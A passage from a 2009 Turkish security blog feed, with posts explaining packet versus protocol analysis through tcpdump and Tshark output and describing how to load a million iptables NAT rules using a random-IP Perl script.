<p>Not: Bu yazı yayınlandıktan 3 ay sonra tekrar bir test yapıp daha detaylı sonuçlar paylaşmayı planlıyorum.</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;title=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti&amp;bodytext=%0D%0A%0D%0AYakla%C5%9F%C4%B1k%20olarak%20%C3%BC%C3%A7%20ay%20%C3%B6nce%20t%C3%BCm%20ISC%20Bind%20s%C3%BCr%C3%BCmlerini%20etkileyen%20bir%20a%C3%A7%C4%B1kl%C4%B1k%20yay%C4%B1nland%C4%B1.%C2%A0%20A%C3%A7%C4%B1kl%C4%B1k%20DNS%20servisini%20etkiledi%C4%9Fi%20i%C3%A7in%20%C3%A7ok%20kritikti%28%20dns%27in%20%C3%A7alismamasi%20ne%20demek%3F%C2%A0Mail%20alisverisinin%20durmasi%2C%20web%20sayfalarinin%20%C3%A7alismamas" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;title=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti&amp;notes=%0D%0A%0D%0AYakla%C5%9F%C4%B1k%20olarak%20%C3%BC%C3%A7%20ay%20%C3%B6nce%20t%C3%BCm%20ISC%20Bind%20s%C3%BCr%C3%BCmlerini%20etkileyen%20bir%20a%C3%A7%C4%B1kl%C4%B1k%20yay%C4%B1nland%C4%B1.%C2%A0%20A%C3%A7%C4%B1kl%C4%B1k%20DNS%20servisini%20etkiledi%C4%9Fi%20i%C3%A7in%20%C3%A7ok%20kritikti%28%20dns%27in%20%C3%A7alismamasi%20ne%20demek%3F%C2%A0Mail%20alisverisinin%20durmasi%2C%20web%20sayfalarinin%20%C3%A7alismamas" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;t=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;title=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;title=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti&amp;annotation=%0D%0A%0D%0AYakla%C5%9F%C4%B1k%20olarak%20%C3%BC%C3%A7%20ay%20%C3%B6nce%20t%C3%BCm%20ISC%20Bind%20s%C3%BCr%C3%BCmlerini%20etkileyen%20bir%20a%C3%A7%C4%B1kl%C4%B1k%20yay%C4%B1nland%C4%B1.%C2%A0%20A%C3%A7%C4%B1kl%C4%B1k%20DNS%20servisini%20etkiledi%C4%9Fi%20i%C3%A7in%20%C3%A7ok%20kritikti%28%20dns%27in%20%C3%A7alismamasi%20ne%20demek%3F%C2%A0Mail%20alisverisinin%20durmasi%2C%20web%20sayfalarinin%20%C3%A7alismamas" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F&amp;title=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=G%C3%BCvenli%C4%9Fi%20ciddiye%20al%C4%B1yor%20musunuz%3F%20Bind%20DOS%20Zaafiyeti%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F11%2F07%2Fguvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2009/07/29/bind-9-dynamic-update-dos-zaafiyeti/' rel='bookmark' title='Permanent Link: BIND 9 Dynamic Update DoS Zaafiyeti- Acil'>BIND 9 Dynamic Update DoS Zaafiyeti- Acil</a></li>
<li><a href='http://blog.lifeoverip.net/2007/07/26/bind-9-cache-poisoning-zayifligi-ve-openbsd/' rel='bookmark' title='Permanent Link: BIND 9 cache poisoning zayifligi ve OpenBSD'>BIND 9 cache poisoning zayifligi ve OpenBSD</a></li>
<li><a href='http://blog.lifeoverip.net/2009/01/12/guvenligi-gercekten-ciddiye-aliyor-muyuz-dns-cache-poisoning-acikligi/' rel='bookmark' title='Permanent Link: Güvenligi gercekten ciddiye aliyor muyuz-DNS Cache poisoning acikligi'>Güvenligi gercekten ciddiye aliyor muyuz-DNS Cache poisoning acikligi</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/11/07/guvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Paket analizi, protokol analizi kavramları</title>
		<link>http://blog.lifeoverip.net/2009/09/13/paket-analizi-protokol-analizi-kavramlari/</link>
		<comments>http://blog.lifeoverip.net/2009/09/13/paket-analizi-protokol-analizi-kavramlari/#comments</comments>
		<pubDate>Sun, 13 Sep 2009 16:55:52 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[IDS/IPS/IDP]]></category>
		<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Network Tools]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1505</guid>
		<description><![CDATA[Paket ve protokol birbirleri yerine sık kullanılan ama gerçekte birbirinden farklı iki kavramdır. Paket kavramı protokol kavramına göre daha kuşatıcıdır(paket&#62;protokol). Paket&#8217;den kastımız TCP/IP ağlarda tüm iletişimin temelidir. Protokol ise paketlerin detayıdır. Gönderip aldığımız mailler, web sayfalarına girişimiz, mesaj gönderişimiz hatta 3g kullanıyorsak telefon konuşmalarımız vs arka planda hep paketler vasıtasıyla kotarılır. Bu paketleri görmek Sniffer adı [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2009/01/17/thsark-ile-tcpip-paket-analizi/' rel='bookmark' title='Permanent Link: Thsark ile TCP/IP Paket Analizi'>Thsark ile TCP/IP Paket Analizi</a></li>
<li><a href='http://blog.lifeoverip.net/2007/03/26/scapy-calismalari-iii-paket-dinleyicileri-belirleme/' rel='bookmark' title='Permanent Link: Scapy Calismalari-III [Paket Dinleyicileri Belirleme]'>Scapy Calismalari-III [Paket Dinleyicileri Belirleme]</a></li>
<li><a href='http://blog.lifeoverip.net/2009/09/13/aginizda-hangi-protokol-ne-kadar-kullaniliyor/' rel='bookmark' title='Permanent Link: Ağınızda hangi protokol ne kadar kullanılıyor?'>Ağınızda hangi protokol ne kadar kullanılıyor?</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Paket ve protokol birbirleri yerine sık kullanılan ama gerçekte birbirinden farklı iki kavramdır. Paket kavramı protokol kavramına göre daha kuşatıcıdır(paket&gt;protokol). Paket&#8217;den kastımız TCP/IP ağlarda tüm iletişimin temelidir. Protokol ise paketlerin detayıdır.</p>
<p>Gönderip aldığımız mailler, web sayfalarına girişimiz, mesaj gönderişimiz hatta 3g kullanıyorsak telefon konuşmalarımız vs arka planda hep paketler vasıtasıyla kotarılır. Bu paketleri görmek Sniffer adı verilen programlar vasıtasıyla mümkün olur. </p>
<p>Bir de bu paketler içerisinde gidip gelen protokoller vardır. Mesela web sayfalarına giriş için HTTP, 3G ya da GPRS bağlantıları için GTP, mail için SMTP . Bir de bunlar için güvenli ulaşım sağlayan alt seviye protokoller vardır TCP, IP, UDP gibi. Tüm bu protokoller iletişime geçmek isteyen uçlar arasında azami standartları belirlemek için düşünülmüştür.</p>
<p>Paket ve protokol analizi için sniffer araçları kullanılır. Bazı snifferlar kısıtlı protokol analizi yapabilirken b azı snifferlar detaylı paket ve protokol analizi yapmaya olanak sağlar. Kısıtlı paket ve protokol analizine imkan sağlayan sniffer olarak tcpdump&#8217;ı, gelişmiş paket ve protol analizine örnek olarak da Wireshark/Tshark&#8217;ı örnek verebiliriz.</p>
<p><strong>Sniffer aracılığıyla paket analizi</strong></p>
<p>tcpdump ile HTTP trafigi analizi</p>
<p style="padding-left: 30px;"><strong>~# tcpdump -i eth0 -ttttnn tcp port 80 -vv<span id="more-1505"></span><br />
</strong>tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes<br />
2009-09-08 05:47:23.057285 IP (tos 0&#215;0, ttl 64, id 28117, offset 0, flags [DF], proto TCP (6), length 52) 10.200.169.163.45196 &gt; 64.233.169.147.80: S, ck                 sum 0xfdbf (correct), 906286265:906286265(0) win 5840 &lt;mss 1460,nop,nop,sackOK,nop,wscale 6&gt;
</p>
<p style="padding-left: 30px;">2009-09-08 05:47:23.191048 IP (tos 0&#215;0, ttl 52, id 58446, offset 0, flags [none], proto TCP (6), length 52) 64.233.169.147.80 &gt; 10.200.169.163.45196: S,                  cksum 0x535f (correct), 2146314999:2146314999(0) ack 906286266 win 5720 &lt;mss 1430,nop,nop,sackOK,nop,wscale 6&gt;</p>
<p style="padding-left: 30px;">2009-09-08 05:47:23.191090 IP (tos 0&#215;0, ttl 64, id 28118, offset 0, flags [DF], proto TCP (6), length 40) 10.200.169.163.45196 &gt; 64.233.169.147.80: ., ck                 sum 0xaa0e (correct), 1:1(0) ack 1 win 92</p>
<p style="padding-left: 30px;">2009-09-08 05:47:23.191924 IP (tos 0&#215;0, ttl 64, id 28119, offset 0, flags [DF], proto TCP (6), length 239) 10.200.169.163.45196 &gt; 64.233.169.147.80: P 1:                 200(199) ack 1 win 92<br />
2009-09-08 05:47:23.325691 IP (tos 0&#215;0, ttl 52, id 58447, offset 0, flags [none], proto TCP (6), length 40) 64.233.169.147.80 &gt; 10.200.169.163.45196: .,                  cksum 0xa938 (correct), 1:1(0) ack 200 win 107<br />
2009-09-08 05:47:23.328801 IP (tos 0&#215;0, ttl 52, id 58448, offset 0, flags [none], proto TCP (6), length 608) 64.233.169.147.80 &gt; 10.200.169.163.45196: P                  1:569(568) ack 200 win 107<br />
2009-09-08 05:47:23.328818 IP (tos 0&#215;0, ttl 64, id 28120, offset 0, flags [DF], proto TCP (6), length 40) 10.200.169.163.45196 &gt; 64.233.169.147.80: ., ck                 sum 0xa6fe (correct), 200:200(0) ack 569 win 109<br />
2009-09-08 05:47:23.328826 IP (tos 0&#215;0, ttl 52, id 58449, offset 0, flags [none], proto TCP (6), length 40) 64.233.169.147.80 &gt; 10.200.169.163.45196: F,                  cksum 0xa6ff (correct), 569:569(0) ack 200 win 107<br />
2009-09-08 05:47:23.368014 IP (tos 0&#215;0, ttl 64, id 28121, offset 0, flags [DF], proto TCP (6), length 40) 10.200.169.163.45196 &gt; 64.233.169.147.80: ., ck                 sum 0xa6fd (correct), 200:200(0) ack 570 win 109</p>
<p>Yukardaki çıktıya bakılacak olursa her bir satır bir paketi işsaret eder. Satırlar incelenirse HTTP protokolüne ait   bilgi edinilemez, sadece TCP protokolüne ait bazı bilgiler elde edilebilir.</p>
<p>Bunun sebebi analiz için kullandığımız yazılımın(tcpdump) kısıtlı protokol analizine sahip olmasıdır(tcpdump tcp, ip, udp vs gibi alt seviye protokollere ait analiz imkanı sunar). Bizim görmek istediğimiz HTTP&#8217;e ait başlık bilgileri ise tcpdump ile görüntülenemez. Bunun için Wireshark/Tshark kullanmamız gerekir.</p>
<p><strong>Sniffer aracılığıyla protokol analizi</strong></p>
<p>Aşağıdaki çıktılar Tshark sniffer programından alınmıştır. Görüleceği üzere bir HTTP paketine ait tüm detaylar bulunmaktadır.</p>
<p>Capturing on eth0
</p>
<p style="padding-left: 30px;">&#8230;<br />
Transmission Control Protocol, Src Port: 56537 (56537), Dst Port: http (80), Seq: 1, Ack: 1, Len: 199<br />
    Source port: 56537 (56537)<br />
    Destination port: http (80)<br />
    Sequence number: 1    (relative sequence number)<br />
    [Next sequence number: 200    (relative sequence number)]<br />
    Acknowledgement number: 1    (relative ack number)<br />
    Header length: 20 bytes<br />
    Flags: 0&#215;18 (PSH, ACK)<br />
        0&#8230; &#8230;. = Congestion Window Reduced (CWR): Not set<br />
        .0.. &#8230;. = ECN-Echo: Not set<br />
        ..0. &#8230;. = Urgent: Not set<br />
        &#8230;1 &#8230;. = Acknowledgment: Set<br />
        &#8230;. 1&#8230; = Push: Set<br />
        &#8230;. .0.. = Reset: Not set<br />
        &#8230;. ..0. = Syn: Not set<br />
        &#8230;. &#8230;0 = Fin: Not set<br />
    Window size: 5888 (scaled)<br />
    Checksum: 0x9f9e [incorrect, should be 0xf736 (maybe caused by "TCP checksum offload"?)]<br />
        [Good Checksum: False]<br />
        [Bad Checksum: True]<br />
Hypertext Transfer Protocol<br />
    GET / HTTP/1.0\r\n<br />
        Request Method: GET<br />
        Request URI: /<br />
        Request Version: HTTP/1.0<br />
    Host: <a href="http://www.google.com\r\n">www.google.com\r\n</a><br />
    Accept: text/html, text/plain, text/css, text/sgml, */*;q=0.01\r\n<br />
    Accept-Encoding: gzip, bzip2\r\n<br />
    Accept-Language: en\r\n<br />
    User-Agent: Lynx/2.8.6rel.4 libwww-FM/2.14\r\n<br />
    \r\n</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;title=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1&amp;bodytext=Paket%20ve%20protokol%20birbirleri%20yerine%20s%C4%B1k%20kullan%C4%B1lan%20ama%20ger%C3%A7ekte%20birbirinden%20farkl%C4%B1%20iki%20kavramd%C4%B1r.%20Paket%20kavram%C4%B1%20protokol%20kavram%C4%B1na%20g%C3%B6re%20daha%20ku%C5%9Fat%C4%B1c%C4%B1d%C4%B1r%28paket%26gt%3Bprotokol%29.%20Paket%27den%20kast%C4%B1m%C4%B1z%20TCP%2FIP%20a%C4%9Flarda%20t%C3%BCm%20ileti%C5%9Fimin%20temelidir.%20" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;title=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1&amp;notes=Paket%20ve%20protokol%20birbirleri%20yerine%20s%C4%B1k%20kullan%C4%B1lan%20ama%20ger%C3%A7ekte%20birbirinden%20farkl%C4%B1%20iki%20kavramd%C4%B1r.%20Paket%20kavram%C4%B1%20protokol%20kavram%C4%B1na%20g%C3%B6re%20daha%20ku%C5%9Fat%C4%B1c%C4%B1d%C4%B1r%28paket%26gt%3Bprotokol%29.%20Paket%27den%20kast%C4%B1m%C4%B1z%20TCP%2FIP%20a%C4%9Flarda%20t%C3%BCm%20ileti%C5%9Fimin%20temelidir.%20" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;t=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;title=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;title=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1&amp;annotation=Paket%20ve%20protokol%20birbirleri%20yerine%20s%C4%B1k%20kullan%C4%B1lan%20ama%20ger%C3%A7ekte%20birbirinden%20farkl%C4%B1%20iki%20kavramd%C4%B1r.%20Paket%20kavram%C4%B1%20protokol%20kavram%C4%B1na%20g%C3%B6re%20daha%20ku%C5%9Fat%C4%B1c%C4%B1d%C4%B1r%28paket%26gt%3Bprotokol%29.%20Paket%27den%20kast%C4%B1m%C4%B1z%20TCP%2FIP%20a%C4%9Flarda%20t%C3%BCm%20ileti%C5%9Fimin%20temelidir.%20" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F&amp;title=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=Paket%20analizi%2C%20protokol%20analizi%20kavramlar%C4%B1%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F13%2Fpaket-analizi-protokol-analizi-kavramlari%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2009/01/17/thsark-ile-tcpip-paket-analizi/' rel='bookmark' title='Permanent Link: Thsark ile TCP/IP Paket Analizi'>Thsark ile TCP/IP Paket Analizi</a></li>
<li><a href='http://blog.lifeoverip.net/2007/03/26/scapy-calismalari-iii-paket-dinleyicileri-belirleme/' rel='bookmark' title='Permanent Link: Scapy Calismalari-III [Paket Dinleyicileri Belirleme]'>Scapy Calismalari-III [Paket Dinleyicileri Belirleme]</a></li>
<li><a href='http://blog.lifeoverip.net/2009/09/13/aginizda-hangi-protokol-ne-kadar-kullaniliyor/' rel='bookmark' title='Permanent Link: Ağınızda hangi protokol ne kadar kullanılıyor?'>Ağınızda hangi protokol ne kadar kullanılıyor?</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/09/13/paket-analizi-protokol-analizi-kavramlari/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Iptables&#8217;in sınırlarını zorlamak &#8211; 1 milyon nat kuralı</title>
		<link>http://blog.lifeoverip.net/2009/09/02/iptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali/</link>
		<comments>http://blog.lifeoverip.net/2009/09/02/iptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali/#comments</comments>
		<pubDate>Wed, 02 Sep 2009 08:02:33 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Firewalls]]></category>
		<category><![CDATA[Linux Security]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1482</guid>
		<description><![CDATA[Bir projede şöyle bir ihtiyaç oldu: Bridge modda çalışıp belirli adreslere(1000.000 farklı ip adresi) giden istekler yereldeki bir proxy&#8217;e yönlendirilecek ve kullanıcıya uyarı gösterilecek.   Belirli adresler haricine gidecek paketlere hiç dokunulmayacak. Projede Linux kullandığımız için paket filtreleme/nat aracı olarak da Iptables(Linux ile birlikte gelen güvenlik duvarı yazılımı)kullanmak zorunda kaldık.   Proje sonucunun  başarılı olabilmesi için  [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2007/05/22/guvenlik-sistemlerine-dayaniklilik-testi/' rel='bookmark' title='Permanent Link: Guvenlik sistemlerine dayaniklilik testi'>Guvenlik sistemlerine dayaniklilik testi</a></li>
<li><a href='http://blog.lifeoverip.net/2006/05/20/oturum-kurulmus-tcp-baglantilarini-sonlandirma/' rel='bookmark' title='Permanent Link: Oturum kurulmus TCP baglantilarini Sonlandirma'>Oturum kurulmus TCP baglantilarini Sonlandirma</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1483" title="frs" src="http://blog.lifeoverip.net/wp-content/uploads/2009/09/frs.jpg" alt="frs" width="223" height="148" /></p>
<p>Bir projede şöyle bir ihtiyaç oldu: Bridge modda çalışıp belirli adreslere(1000.000 farklı ip adresi) giden istekler yereldeki bir proxy&#8217;e yönlendirilecek ve kullanıcıya uyarı gösterilecek.</p>
<p> </p>
<p>Belirli adresler haricine gidecek paketlere hiç dokunulmayacak. Projede Linux kullandığımız için paket filtreleme/nat aracı olarak da Iptables(Linux ile birlikte gelen güvenlik duvarı yazılımı)kullanmak zorunda kaldık.</p>
<p> </p>
<p>Proje sonucunun  başarılı olabilmesi için  iptables&#8217;a 1000.000 nat kuralı girmemiz gerekti, önce bir script aracılığıyla başarmaya çalıştık fakat iptables eş zamanlı olarak bir adet kural girilmesine izin verdi. Biz de 1000.000 ip adresini iptables-restore komutunun anlayacağı hale getirip</p>
<p><em>iptables-restore &lt; black_list</em></p>
<p>komutuyla sisteme girmeye çalıştık. Bu arada sistem</p>
<p style="padding-left: 30px;">
&#8220;kernel: allocation failed: out of vmalloc space &#8211; use vmalloc=&lt;size&gt; to increase size.&#8221;</p>
<p>hatası vererek 100.000 den fazla kuralı kabul etmedi.</p>
<p><strong>Çözüm:</strong></p>
<p>grub.conf&#8217;da<br />
kernel /vmlinuz-2..</p>
<p>satırının sonuna vmalloc=600MB(default&#8217;u 250MB miş gerektiği kadar arttırmak lazım) yapınca sorunumuz çözüldü ve istediğimiz sayıda kuralı iptables&#8217;a 40-50 saniye gibi kısa bir sürede girebildik.</p>
<p>Siz de firewall&#8217;un kural performansını test etmek isterseniz aşağıdaki rastgele ip üreteç scriptinden faydalanıp kendi kurallarınızı yazabilirsiniz.</p>
<p>Random ip adresi üretmek için kullandığım script:
</p>
<p style="padding-left: 30px;">#!/usr/bin/perl<br />
use strict;<br />
srand(time() ^ ($$ + ($$ &lt;&lt; 15)));</p>
<p style="padding-left: 30px;">for (1..1000000){<br />
    print join (&#8216;.&#8217;, (int(rand(255))<br />
                     ,int(rand(255))<br />
                     ,int(rand(255))<br />
                     ,int(rand(255))))<br />
          , &#8220;\n&#8221;;<br />
}</p>
<p>Kaynak:http://www.perlmonks.org/?node_id=389028</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;title=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1&amp;bodytext=%0D%0A%0D%0ABir%20projede%20%C5%9F%C3%B6yle%20bir%20ihtiya%C3%A7%20oldu%3A%20Bridge%20modda%20%C3%A7al%C4%B1%C5%9F%C4%B1p%20belirli%20adreslere%281000.000%20farkl%C4%B1%20ip%20adresi%29%20giden%20istekler%20yereldeki%20bir%20proxy%27e%20y%C3%B6nlendirilecek%20ve%20kullan%C4%B1c%C4%B1ya%20uyar%C4%B1%20g%C3%B6sterilecek.%0D%0A%0D%0A%C2%A0%0D%0A%0D%0ABelirli%20adresler%20haricine%20gidecek%20" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
